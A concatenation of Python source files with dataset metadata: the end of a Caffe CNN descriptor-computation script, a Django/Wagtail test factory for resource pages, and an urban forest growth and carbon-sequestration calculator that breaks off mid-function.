self.log.info("Generating prototext config file")
config_str = CNN_PROTOTXT_TEMPLATE.render(**{
"image_mean_filepath": CNN_IMAGE_MEAN,
"image_filelist_filepath": list_filepath,
"batch_size": gpu_batch_size,
})
fd, protoconfig_filepath = tempfile.mkstemp(suffix='.prototxt', dir=TEMP_DIR)
os.close(fd)
with open(protoconfig_filepath, 'w') as ofile:
ofile.write(config_str)
# Call executable
fd, output_filebase = tempfile.mkstemp(dir=TEMP_DIR)
os.close(fd)
os.remove(output_filebase)
# The output file that actually gets generated
output_csv = output_filebase + '.csv'
call_args = [
CNN_EXE, CNN_CAFFE_MODE, protoconfig_filepath, 'fc7',
output_filebase, str(cnn_minibatch_size), 'csv', 'GPU'
]
self.log.info("Call args: %s", call_args)
proc_cnn = subprocess.Popen(call_args)
rc = proc_cnn.wait()
if rc:
self.log.warn("Failed to execute CNN executable with return code: %s", rc)
self.log.warn("Skipping images in previous batch due to error")
#raise RuntimeError("Failed to execute CNN executable with return code: %s" % rc)
else:
# if we succeeded,
# Parse output file into SMQTK DescriptorElement instances
self.log.info("Parsing output descriptors")
pool = multiprocessing.Pool(self.PARALLEL)
d_elems = pool.map(set_descriptor,
zip(keys, smqtk.utils.file_utils.iter_csv_file(output_csv)))
pool.close()
pool.join()
# Remove temp files used
self.log.info("Cleaning up")
pool = multiprocessing.Pool(self.PARALLEL)
pool.map(os.remove, temp_files)
pool.close()
pool.join()
os.remove(list_filepath)
os.remove(protoconfig_filepath)
os.remove(output_csv)
self.log.info("Returning elements")
def run():
log = logging.getLogger("compute.run2")
log.info("Feed queue max size: %d", FEED_QUEUE_MAX_SIZE)
f_queue = multiprocessing.Queue(FEED_QUEUE_MAX_SIZE)
c_queue = multiprocessing.Queue() # This queue will never effectively be that large
if os.path.exists(HBASE_KEY_CHECKPOINT_FILEPATH):
with open(HBASE_KEY_CHECKPOINT_FILEPATH) as f:
start_key = f.read().strip()
log.info("starting from key: '%s'", start_key)
else:
start_key = HBASE_START_KEY
feeder = HBaseFeeder(start_key, HBASE_STOP_KEY, f_queue, HBASE_BATCH_SIZE)
generator = CaffeDescriptorGenerator(f_queue, c_queue, CNN_BATCH_SIZE, CNN_GPU_BATCH_SIZE)
feeder.start()
generator.start()
log.info("Monitoring complete queue for checkpoint keys")
checking = True
while checking:
k = c_queue.get()
if k is None:
checking = False
else:
with open(HBASE_KEY_CHECKPOINT_FILEPATH, 'w') as f:
f.write(k)
log.info("Checkpointed key: '%s'", k)
log.info("Waiting for worker processes to complete.")
feeder.join()
generator.join()
if __name__ == "__main__":
smqtk.utils.bin_utils.initialize_logging(logging.getLogger('compute'), logging.INFO)
run()
| 34.650108 | 111 | 0.63442 |
59da50cf240a71fbac66c2a9b071e154da0ec946 | 1,966 | py | Python | functional_tests/factory/resource_factory.py | 9sneha-n/pari | 78e1e4851e484c076ce6ba3c76d1db081aacbc9a | [
"BSD-3-Clause"
] | 35 | 2015-10-04T17:07:20.000Z | 2022-03-23T08:10:13.000Z | functional_tests/factory/resource_factory.py | 9sneha-n/pari | 78e1e4851e484c076ce6ba3c76d1db081aacbc9a | [
"BSD-3-Clause"
] | 322 | 2015-07-31T17:06:47.000Z | 2022-02-10T07:17:55.000Z | functional_tests/factory/resource_factory.py | 9sneha-n/pari | 78e1e4851e484c076ce6ba3c76d1db081aacbc9a | [
"BSD-3-Clause"
] | 14 | 2016-05-09T10:50:20.000Z | 2021-05-08T14:48:51.000Z | import factory
from django.contrib.contenttypes.models import ContentType
from django.utils.text import slugify
from wagtail.core.rich_text import RichText
from resources.models import Resource
class ContentTypeFactory(factory.django.DjangoModelFactory):
class Meta:
model = ContentType
django_get_or_create = ('app_label', 'model')
app_label = "core"
model = "homepage"
class ResourceFactory(factory.django.DjangoModelFactory):
class Meta:
model = Resource
path = factory.Sequence(lambda n: u'00010{}'.format(n)) # from wagtailcore_pagerevision
depth = 3
numchild = 0
title = 'Dummy Resource Page'
slug = factory.LazyAttribute(lambda obj: slugify(obj.title))
live = True
has_unpublished_changes = False
show_in_menus = False
search_description = ''
go_live_at = '1995-02-07 12:00'
expire_at = '2050-12-31 12:43'
expired = False
content_type = factory.SubFactory(ContentTypeFactory, app_label="resource", model="resource")
locked = False
latest_revision_created_at = '1995-02-07 12:00'
first_published_at = '1995-02-07 12:00'
language = 'en'
content = [('authors', RichText('<p>XYZ</p>')),
('copyright', RichText('<p>XYZ, Professor, Centre for Economic Studies and Planning</p><p>\u00a0</p>')),
('focus',
RichText('<p>The 2008 global food price fluctuations -- especially the policies on bio-fuel and the neglect of agriculture.</p>')),
('factoids', RichText('<p>Lack of public investment in agriculture and agriculture research .</p>'))]
@classmethod
def _setup_next_sequence(cls):
return getattr(cls, 'starting_sequence_num', 20)
@factory.post_generation
def categories(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for category in extracted:
self.categories.add(category)
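# Usage sketch (illustrative; the title and category objects are hypothetical):
# ResourceFactory(title='Water survey') builds a Resource page whose slug is derived
# from the title via slugify, and ResourceFactory(categories=[cat_a, cat_b]) attaches
# categories through the post-generation hook above.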
| 33.896552 | 147 | 0.669379 |
0f3208ac4aa8e0cd144fa044a7212156aafe85f3 | 26,210 | py | Python | growth.py | Venkatprasadkalet1/carboncalc | b7a66407b453e16d9b8606f6ceac43e882c16b19 | [
"Unlicense"
] | null | null | null | growth.py | Venkatprasadkalet1/carboncalc | b7a66407b453e16d9b8606f6ceac43e882c16b19 | [
"Unlicense"
] | null | null | null | growth.py | Venkatprasadkalet1/carboncalc | b7a66407b453e16d9b8606f6ceac43e882c16b19 | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 18 13:06:05 2014
@author: adh
Urban forest calculator: Calculate carbon added in previous year.
"""
import biomass
import sqlite3
from numpy import exp, log, sqrt
from scipy.optimize import brentq, fsolve
UrbForDB = "/home/adh/UrbanForests/UrbanForestCC.sqlite"
roots = 1.00
carbon_fraction = 0.5
co2_fraction = 3.67
dbconn = sqlite3.connect(UrbForDB)
def equation_loglogw1(x, a, b, c, d, e):
"""Equation form for loglogw1 """
return exp(a + b * log(log(x+1) + (c/2)))
def equation_loglogw2(x, a, b, c, d, e):
"""Equation form for loglogw2 """
return exp(a + b * log(log(x+1)) + (sqrt(x) * (c/2)))
def equation_loglogw3(x, a, b, c, d, e):
"""Equation form for loglogw3 """
return exp(a + b * log(log(x+1)) + x * c/2)
def equation_loglogw4(x, a, b, c, d, e):
"""Equation form for loglogw4 """
return exp(a + b * log(log(x+1))+ x * x * c/2)
def equation_lin(x, a, b, c=0, d=0, e=0):
"""Equation form for lin """
return a + b*x
def equation_quad(x, a, b, c, d=0, e=0):
"""Equation form for quad """
return a + b*x + c*x*x
def equation_cub(x, a, b, c, d, e):
"""Equation form for cub """
return a + b*x + c*x*x + d*x*x*x
def equation_quart(x, a, b, c, d, e):
"""Equation form for quart """
return a + b*x + c*x*x + d*x*x*x + e*x*x*x*x
def equation_expow1(x, a, b, c, d, e):
"""Equation form for expow1 """
return exp(a + b*x + c/10)
def equation_expow2(x, a, b, c, d, e):
"""Equation form for expow2 """
return exp(a + b*x + sqrt(x)*c/2)
def equation_expow3(x, a, b, c, d, e):
"""Equation form for expow3 """
return exp(a + b*x + x*c/2)
def equation_expow4(x, a, b, c, d, e):
"""Equation form for expow4 """
return exp(a + b*x + x*x*c/2)
eqn_lookup = {'lin1/age^2': equation_lin, 'quad1/age^2': equation_quad,
'quad1/age': equation_quad, 'cub1/age^2': equation_cub,
'loglogw1': equation_loglogw1, 'loglogw3': equation_loglogw3,
'lin1/age': equation_lin, 'lin1/sqrtage': equation_lin,
'quad1/sqrtdbh': equation_quad, 'loglogw2': equation_loglogw2,
'quad1/dbh': equation_quad, 'loglogw4': equation_loglogw4,
'quad1/dbh^2': equation_quad, 'lin1/dbh': equation_lin,
'lin1/dbh^2': equation_lin, 'quart1/age': equation_quart,
'lin1/sqrtdbh': equation_lin, u'lin1/sqrtdbh': equation_lin,
'lin1': equation_lin, 'expow1': equation_expow1,
'quad1': equation_quad, 'quad1/ht': equation_quad,
'cub1/dbh^2': equation_cub, 'quad1/sqrht': equation_quad,
'cub1/ht': equation_cub, 'expow2': equation_expow2,
'cub1/dbh': equation_cub, 'cuborig1/sqrtage': equation_cub,
'cub1/ht^2': equation_cub, 'cub1/sqrtht': equation_cub,
'quad1/sqrtage': equation_quad, 'cub1/sqrtdbh': equation_cub,
'cub1': equation_cub, 'cub1/age': equation_cub,
'cub1/sqrtage': equation_cub, 'quadorig1/age': equation_quad,
'quart1/sqrtht': equation_quart, 'expow4': equation_expow4,
'expow3': equation_expow3, 'lin1/ht^2': equation_lin,
'quad1/ht^2': equation_quad, 'lin1/ht': equation_lin,
'quadorig1/sqrtht': equation_quad, 'cuborig1/sqrtht': equation_cub,
'loglog1': equation_loglogw1}
eqsolver_lookup = {'lin1/age^2': 'brentq', 'quad1/age^2': 'fsolve',
'quad1/age': 'fsolve', 'cub1/age^2': 'fsolve',
'loglogw1': 'brentq', 'loglogw3': 'brentq',
'lin1/age': 'brentq', 'lin1/sqrtage': 'brentq',
'quad1/sqrtdbh': 'fsolve', 'loglogw2': 'brentq',
'quad1/dbh': 'fsolve', 'loglogw4': 'brentq',
'quad1/dbh^2': 'fsolve', 'lin1/dbh': 'brentq',
'lin1/dbh^2': 'brentq', 'quart1/age': 'fsolve',
'lin1/sqrtdbh': 'brentq', u'lin1/sqrtdbh': 'brentq',
'lin1': 'brentq', 'expow1': 'brentq',
'quad1': 'fsolve', 'quad1/ht': 'fsolve',
'cub1/dbh^2': 'fsolve', 'quad1/sqrht': 'fsolve',
'cub1/ht': 'fsolve', 'expow2': 'brentq',
'cub1/dbh': 'fsolve', 'cuborig1/sqrtage': 'fsolve',
'cub1/ht^2': 'fsolve', 'cub1/sqrtht': 'fsolve',
'quad1/sqrtage': 'fsolve', 'cub1/sqrtdbh': 'fsolve',
'cub1': 'fsolve', 'cub1/age': 'fsolve',
'cub1/sqrtage': 'fsolve', 'quadorig1/age': 'fsolve',
'quart1/sqrtht': 'fsolve', 'expow4': 'brentq',
'expow3': 'brentq', 'lin1/ht^2': 'brentq',
'quad1/ht^2': 'fsolve', 'lin1/ht': 'brentq',
'quadorig1/sqrtht': 'fsolve', 'cuborig1/sqrtht': 'fsolve',
'loglog1': 'brentq'}
def root_form(fn, y0):
"""Returns rewritten equation fn to find root at y value y0"""
def fn2(x, a=0, b=0, c=0, d=0, e=0):
return fn(x, a, b, c, d, e) - y0
return fn2
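# Worked example (sketch): for the linear form fn(x) = a + b*x ('lin1'), root_form(fn, y0)
# returns g(x) = a + b*x - y0, so the age at which a tree reaches a measured dbh y0 is a
# root of g; find_eqn_root() below solves g(x) = 0 with brentq or fsolve, as chosen per
# equation family in eqsolver_lookup.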
#def find_eqn_root(fn, y0, a, b, c, d, e, lower_bound, upper_bound):
# fn2 = root_form(fn, y0)
# x0 = brentq(fn2, args=(a, b, c, d, e), a=lower_bound, b=upper_bound)
# return
# Let's try a different solver.
def find_eqn_root(fn, y0, eqstr, a, b, c, d, e, lower_bound, upper_bound):
"""Finds root of equation fn at y value y0. """
#tol = 0.001
#step = 0.1
fn2 = root_form(fn, y0)
#if abs(fn2(lower_bound) < tol):
# lower_bound = lower_bound - step
#if abs(fn2(upper_bound) < tol):
# upper_bound = upper_bound + step
#print lower_bound, upper_bound
#x0 = brentq(fn2, args=(a, b, c, d, e), a=lower_bound, b=upper_bound)
# bloody hell. let's try making the solver dependent on the functional form.
if eqsolver_lookup[eqstr] == 'fsolve':
froots = fsolve(fn2, (lower_bound + upper_bound)/2, args=(a, b, c, d, e))
#froots = fsolve(fn2, [lower_bound, upper_bound],args=(a, b, c, d, e))
#print froots
x0 = froots[0]
else:
x0 = brentq(fn2, args=(a, b, c, d, e), a=lower_bound, b=upper_bound)
return x0
def nfloat(s):
"""Return floating point value of s if possible, None if not"""
    if s is not None:
try:
return float(s)
except ValueError:
return None
else:
return None
def growth_calc_species(dbconn, speccode, region):
"""Returns species growth assignment type given species speccode and region code"""
qstr = "SELECT GrowthAssign FROM SpeciesCodeList WHERE SpeciesCode = '%s' AND Region = '%s'" % (speccode, region)
c = dbconn.cursor()
c.execute(qstr)
qresult = c.fetchone()
(growthspecies0) = qresult
growthspecies = growthspecies0[0]
if "OTHER" in growthspecies:
qstr = "SELECT GrowthAssign FROM SpeciesCodeList WHERE SpeciesCode = '%s' AND Region = '%s'" % (growthspecies, region)
c.execute(qstr)
qresult = c.fetchone()
(growthspecies0) = qresult
growthspecies = growthspecies0[0]
return growthspecies
#==============================================================================
# def growth_calc_eqn(dbconn, speccode, region):
# growthspecies = growth_calc_species(dbconn, speccode, region)
# c = dbconn.cursor()
# qstr = "SELECT EqName, a, b, c, d, e, AppsMin, AppsMax FROM GrowCoeffs WHERE SpecCode = '%s' AND Region = '%s' AND Component = 'd.b.h.'" % (growthspecies, region)
# c.execute(qstr)
# qresult = c.fetchone()
# if qresult:
# (eqstr, a, b, c, d, e, AppsMin, AppsMax) = qresult
# eqtype = 'dbh'
# else:
# qstr = "SELECT EqName, a, b, c, d, e, AppsMin, AppsMax FROM GrowCoeffs WHERE SpecCode = '%s' AND Region = '%s' AND Component = 'tree ht'" % (growthspecies, region)
# c.execute(qstr)
# qresult = c.fetchone()
# (eqstr, a, b, c, d, e, AppsMin, AppsMax) = qresult
# eqtype = 'tree ht'
# return eqn_lookup[eqstr], eqtype, nfloat(a), nfloat(b), nfloat(c), nfloat(d), nfloat(e), nfloat(AppsMin), nfloat(AppsMax)
#==============================================================================
def growth_calc_eqn2(dbconn, speccode, region, comptype):
"""Returns equation form and parameters given species code and region."""
growthspecies = growth_calc_species(dbconn, speccode, region)
c = dbconn.cursor()
if comptype == 'd.b.h.':
qstr = "SELECT EqName, a, b, c, d, e, AppsMin, AppsMax FROM GrowCoeffs WHERE SpecCode = '%s' AND Region = '%s' AND Component = 'd.b.h.'" % (growthspecies, region)
c.execute(qstr)
qresult = c.fetchone()
(eqstr, a, b, c, d, e, AppsMin, AppsMax) = qresult
eqtype = 'dbh'
else:
qstr = "SELECT EqName, a, b, c, d, e, AppsMin, AppsMax FROM GrowCoeffs WHERE SpecCode = '%s' AND Region = '%s' AND Component = 'tree ht'" % (growthspecies, region)
c.execute(qstr)
qresult = c.fetchone()
(eqstr, a, b, c, d, e, AppsMin, AppsMax) = qresult
eqtype = 'tree ht'
return eqn_lookup[eqstr], eqtype, eqstr, nfloat(a), nfloat(b), nfloat(c), nfloat(d), nfloat(e), nfloat(AppsMin), nfloat(AppsMax)
#==============================================================================
# def age_calc(dbconn, speccode, region, dbh, ht, rounded, lower_bound, upper_bound):
# """Compute age given dbh or height. Calls function solving eqn that predict dbh|ht from age."""
# (eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn(dbconn, speccode, region)
# #print eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax
# if eqtype == 'dbh':
# age = find_eqn_root(eqn, dbh, a, b, c, d, e, lower_bound, upper_bound)
# else:
# age = find_eqn_root(eqn, ht, a, b, c, d, e, lower_bound, upper_bound)
# if rounded:
# age = int(age)
# return age
#==============================================================================
def age_calc2(dbconn, speccode, region, dbh, ht, rounded, lower_bound, upper_bound, comptype):
"""Compute age given dbh or height. Calls function solving eqn that predict dbh|ht from age."""
#print "lower bound:upper bound: ", lower_bound, upper_bound
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, comptype)
#print eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax
if eqtype == 'dbh':
age = find_eqn_root(eqn, dbh, eqstr, a, b, c, d, e, lower_bound, upper_bound)
else:
age = find_eqn_root(eqn, ht, eqstr, a, b, c, d, e, lower_bound, upper_bound)
#print "age_calc2 age: ", age
if rounded:
age = int(age)
return age
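# Example call (sketch; the species and region codes here are hypothetical):
#   age_calc2(dbconn, 'FRPE', 'InlEmpCLM', dbh=30.0, ht=0, rounded=True,
#             lower_bound=0, upper_bound=100, comptype='d.b.h.')
# inverts the species' dbh-vs-age growth curve to estimate tree age in years.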
#def biomass_diff(dbconn, speccode, region, dbh=0, ht=0, round=False, lower_bound=0, upper_bound=100):
# """Return increase in biomass between current year and previous year."""
# curr_age = age_calc(dbconn, speccode, region, dbh, ht, round, lower_bound, upper_bound)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh, ht)
# prev_age = curr_age - 1
# print "Ages: ", curr_age, prev_age
# (eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn(dbconn, speccode, region)
# if eqtype == 'dbh':
# if round:
# curr_dbh = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=curr_dbh, ht=0)
# prev_dbh = eqn(prev_age, a, b, c, d, e)
# # Let's deal with case where previous dbh is negative.
# if prev_dbh <= 0:
# prev_dbh = AppsMin
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=prev_dbh, ht=0)
# else:
# if round:
# curr_ht = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=curr_ht)
# prev_ht = eqn(prev_age, a, b, c, d, e)
# if prev_ht <= 0:
# prev_ht = AppsMin
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=prev_ht)
# print curr_biomass
# print prev_biomass
# # the results table sets the CO2 sequestration to the carbon stored in this minimum limiting case.
# if abs(curr_biomass[0] - prev_biomass[0]) <= 1e-02:
# return (curr_biomass[0], curr_biomass[1], curr_biomass[2])
# else:
# return (curr_biomass[0]-prev_biomass[0], curr_biomass[1]-prev_biomass[1], curr_biomass[2]-prev_biomass[2])
# now fiddling with new min/max age table
#==============================================================================
# def biomass_diff(dbconn, speccode, region, dbh=0, ht=0, rounded=False, lower_bound=0, upper_bound=100):
# """Return increase in biomass between current year and previous year."""
# c = dbconn.cursor()
# qstr = "SELECT AppsMin, AppsMax, AppsMinAge, AppsMaxAge FROM GrowCoeffsMinMAX WHERE SpecCode = '%s' AND Region = '%s'" % (speccode, region)
# c.execute(qstr)
# qresult = c.fetchone()
# (appsmin, appsmax, appsminage, appsmaxage) = qresult
# curr_age = age_calc(dbconn, speccode, region, dbh, ht, rounded, appsminage, appsmaxage)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh, ht)
# prev_age = curr_age - 1
# #print "Ages: ", curr_age, prev_age
# (eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn(dbconn, speccode, region)
# if eqtype == 'dbh':
# if rounded:
# curr_dbh = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=curr_dbh, ht=0)
# prev_dbh = eqn(prev_age, a, b, c, d, e)
# # Let's deal with case where previous dbh is negative.
# # Nope. Let's use age as the criteriod.
# if curr_age <= appsminage or prev_age < appsminage:
# prev_dbh = AppsMin
# else:
# prev_dbh = eqn(prev_age, a, b, c, d, e)
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=prev_dbh, ht=0)
# else:
# if rounded:
# curr_ht = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=curr_ht)
# prev_ht = eqn(prev_age, a, b, c, d, e)
# if curr_age <= appsminage or prev_age < appsminage:
# prev_ht = AppsMin
# else:
# prev_ht = eqn(prev_age, a, b, c, d, e)
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=prev_ht)
# #print curr_biomass
# #print prev_biomass
# # the results table sets the CO2 sequestration to the carbon stored in this minimum limiting case.
# # not quite -- if prev_biomass fails (negative age e.g.), the calc blows up
# if abs(curr_biomass[0] - prev_biomass[0]) <= 1e-02:
# return (curr_biomass[0], curr_biomass[1], curr_biomass[2])
# else:
# return (curr_biomass[0]-prev_biomass[0], curr_biomass[1]-prev_biomass[1], curr_biomass[2]-prev_biomass[2])
#==============================================================================
def biomass_diff2(dbconn, speccode, region, dbh, ht, rounded=False, lower_bound=0, upper_bound=100):
"""Return increase in biomass between current year and previous year.
Args:
dbconn - database connection handle
speccode - species code
region - region code
dbh - Tree dbh in cm
ht - Tree height in m
rounded - Are ages rounded to the nearest year?
lower_bound - lower age bound (not used)
upper_bound - upper age bound (not used)
Returns:
(difference between current and previous years' biomass,
difference between current and previous years' carbon,
difference between current and previous years' CO2 equivalent)
"""
c = dbconn.cursor()
# need to use growth_species calc here. good thing I have a function.
growthspecies = growth_calc_species(dbconn, speccode, region)
qstr = "SELECT AppsMin, AppsMax, AppsMinAge, AppsMaxAge FROM GrowCoeffsMinMAX WHERE SpecCode = '%s' AND Region = '%s'" % (growthspecies, region)
c.execute(qstr)
qresult = c.fetchone()
(appsmin, appsmax, appsminage, appsmaxage) = qresult
print "appsmin: ", appsmin, "appsmax: ", appsmax, "appsminage: ", appsminage, "appsmaxage: ", appsmaxage
qstr = "SELECT b.EqnName FROM SpeciesCodeList a, VolBioCoeffs b WHERE a.BioMassAssign = b.SpecCode AND a.SpeciesCode = '%s' AND a.Region = '%s'" % (speccode, region)
c = dbconn.cursor()
c.execute(qstr)
qresult = c.fetchone()
(eqn2) = qresult
minmaxtype = biomass.minmaxtypedict[eqn2[0]]
print "eqn: ", eqn2[0], "minmaxtype: ", minmaxtype
if minmaxtype == 'dbh':
if dbh <= appsmin:
dbh = appsmin
curr_age = appsminage
elif dbh >= appsmax:
curr_age = appsmaxage
else:
curr_age = age_calc2(dbconn, speccode, region, dbh, ht, rounded, appsminage, appsmaxage, 'd.b.h.')
else:
if ht <= appsmin:
ht = appsmin
curr_age = appsminage
elif ht >= appsmax:
curr_age = appsmaxage
else:
curr_age = age_calc2(dbconn, speccode, region, dbh, ht, rounded, appsminage, appsmaxage, 'tree ht')
#curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh, ht)
prev_age = curr_age - 1
print "Ages: ", curr_age, prev_age, 'appsminage: ', appsminage, 'appsmaxage: ', appsmaxage
# what if we redo this logic such that we compute previous dbh and height for all
# species. i think this needs rewriting...
if curr_age >= appsmaxage:
if minmaxtype == 'dbh':
dbh = appsmax - 0.0001
else:
ht = appsmax - 0.0001
if curr_age <= appsminage or prev_age < appsminage:
if minmaxtype == 'dbh':
prev_dbh = appsmin
#prev_ht = ht # I persist with the problem for now...slightly changed
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
prev_ht = eqn(prev_dbh, a, b, c, d, e)
else:
prev_ht = appsmin
prev_dbh = dbh
prev_age = appsminage
curr_age = appsminage + 1
else:
try:
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'd.b.h.')
prev_dbh = eqn(prev_age, a, b, c, d, e)
except TypeError: # there are no d.b.h. equations in the grow coeffs table.
prev_dbh = 0
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
if minmaxtype == 'dbh':
prev_ht = eqn(prev_dbh, a, b, c, d, e) # not sure this is true for all eqns! don't look like it.
else:
prev_ht = eqn(prev_age, a, b, c, d, e) # so try this
if rounded:
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'd.b.h.')
curr_dbh = eqn(curr_age, a, b, c, d, e)
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
curr_ht = eqn(curr_age, a, b, c, d, e)
else:
#==============================================================================
# curr_dbh = dbh
# curr_ht = ht
#==============================================================================
#print "in corr block"
if minmaxtype == 'dbh':
#print "corr ht"
curr_dbh = dbh
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
curr_ht = eqn(curr_dbh, a, b, c, d, e)
#print "corr currht: ", curr_ht, "curr age: ", curr_age
else:
curr_ht = ht
curr_dbh = dbh
#print "corr dbh"
#(eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'd.b.h.')
#curr_dbh = eqn(curr_age, a, b, c, d, e)
# print "curr_dbh: ", curr_dbh, "curr_ht: ", curr_ht, "prev_dbh: ", prev_dbh, "prev_ht: ", prev_ht
curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=curr_dbh, ht=curr_ht)
prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=prev_dbh, ht=prev_ht)
#==============================================================================
# (eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn(dbconn, speccode, region)
# if eqtype == 'dbh':
# if rounded:
# curr_dbh = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=curr_dbh, ht=0)
# prev_dbh = eqn(prev_age, a, b, c, d, e)
# # Let's deal with case where previous dbh is negative.
# # Nope. Let's use age as the criteriod.
# if curr_age <= appsminage or prev_age < appsminage:
# prev_dbh = AppsMin
# else:
# prev_dbh = eqn(prev_age, a, b, c, d, e)
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=prev_dbh, ht=0)
# else:
# if rounded:
# curr_ht = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=curr_ht)
# prev_ht = eqn(prev_age, a, b, c, d, e)
# if curr_age <= appsminage or prev_age < appsminage:
# prev_ht = AppsMin
# else:
# prev_ht = eqn(prev_age, a, b, c, d, e)
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=prev_ht)
#==============================================================================
print "curr_biomass", curr_biomass
print "prev_biomass", prev_biomass
# the results table sets the CO2 sequestration to the carbon stored in this minimum limiting case.
# not quite -- if prev_biomass fails (negative age e.g.), the calc blows up
# if curr_age >= appsmaxage:
# return (curr_biomass[0], curr_biomass[1], 0.0)
if abs(curr_biomass[0] - prev_biomass[0]) <= 1e-02:
return (curr_biomass[0], curr_biomass[1], curr_biomass[2])
# else:
# return (curr_biomass[0]-prev_biomass[0], curr_biomass[1]-prev_biomass[1], curr_biomass[2]-prev_biomass[2])
else:
return (curr_biomass[0]-prev_biomass[0], curr_biomass[1]-prev_biomass[1], curr_biomass[2]-prev_biomass[2])
def inv_age_calc(dbconn, speccode, region, age, comptype='d.b.h.'):
    """Compute dbh or height given age. comptype defaults to 'd.b.h.' so callers that omit it keep working."""
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, comptype)
currval = eqn(age, a, b, c, d, e)
return (currval, eqtype, AppsMin, AppsMax)
def biomasstoCO2(biomass0):
"""Compute CO2 equivalent for biomass value."""
return (biomass0 * biomass.carbon_fraction / biomass.roots) * biomass.co2_fraction
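# Worked example (assuming the biomass module exposes the same constants defined near
# the top of this file: carbon_fraction = 0.5, roots = 1.00, co2_fraction = 3.67):
#   biomasstoCO2(100.0) = (100.0 * 0.5 / 1.00) * 3.67 = 183.5 units of CO2 equivalent.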
def growth_age_table(dbconn, speccode, region, comptype='d.b.h.'):
    """Print out table giving dbh/ht values for particular ages..."""
    # growth_calc_eqn2 needs a component type; 'd.b.h.' is assumed here as the default
    (eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, comptype)
    for age in range(0,151):
        print age, eqn(age, a, b, c, d, e)
def growth_coeffs_min_max(dbconn, tol=1e-04):
"""Populate GrowCoeffsMinMax table with corresponding min and max ages to AppsMin and AppsMax"""
c = dbconn.cursor()
qstr = "SELECT DISTINCT Region, SpecCode FROM GrowCoeffs"
c.execute(qstr)
qall = c.fetchall()
specregions = filter(lambda x: x[0] != '', qall)
for specregion in specregions:
appstate = 'BeforeMin'
minage = 0
maxage = 500
for age in range(0, 500):
(currval, eqtype, AppsMin, AppsMax) = inv_age_calc(dbconn, specregion[1], specregion[0], age)
if appstate != 'SeekingMax':
if abs(currval - AppsMin ) < tol:
minage = age
appstate = 'FoundMin'
if appstate == 'FoundMin' and (currval > AppsMin):
appstate = 'SeekingMax'
else:
if abs(currval - AppsMax) < tol:
maxage = age
break
#print specregion[1], specregion[0], AppsMin, AppsMax, minage, maxage
qstr = "INSERT INTO GrowCoeffsMinMAX VALUES ('%s', '%s', %f, %f, %d, %d)" % (specregion[0], specregion[1], AppsMin, AppsMax, minage, maxage )
#print qstr
c.execute(qstr)
dbconn.commit()
"""A few records fail to get values assigned (i.e. stay at 0,500). I manually adjust these
using the GrowthResults table"""
def inv_age_calc2(dbconn, speccode, region, age):
"""Return both dbh and height as a function of age."""
qstr = "SELECT b.EqnName FROM SpeciesCodeList a, VolBioCoeffs b WHERE a.BioMassAssign = b.SpecCode AND a.SpeciesCode = '%s' AND a.Region = '%s'" % (speccode, region)
c = dbconn.cursor()
c.execute(qstr)
qresult = c.fetchone()
(eqn2) = qresult
minmaxtype = biomass.minmaxtypedict[eqn2[0]]
if minmaxtype == 'dbh':
comptype = 'd.b.h.'
else:
comptype = 'tree ht'
#print "eqn: ", eqn2[0], "minmaxtype: ", minmaxtype
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, comptype)
#print "eqn: ", eqn, "eqtype: ", eqtype, "a: ", a, "b: ", b, "c: ", c, "d: ", d, "e: ", e
currval = eqn(age, a, b, c, d, e)
if currval < AppsMin:
currval = AppsMin
if currval > AppsMax:
currval = AppsMax
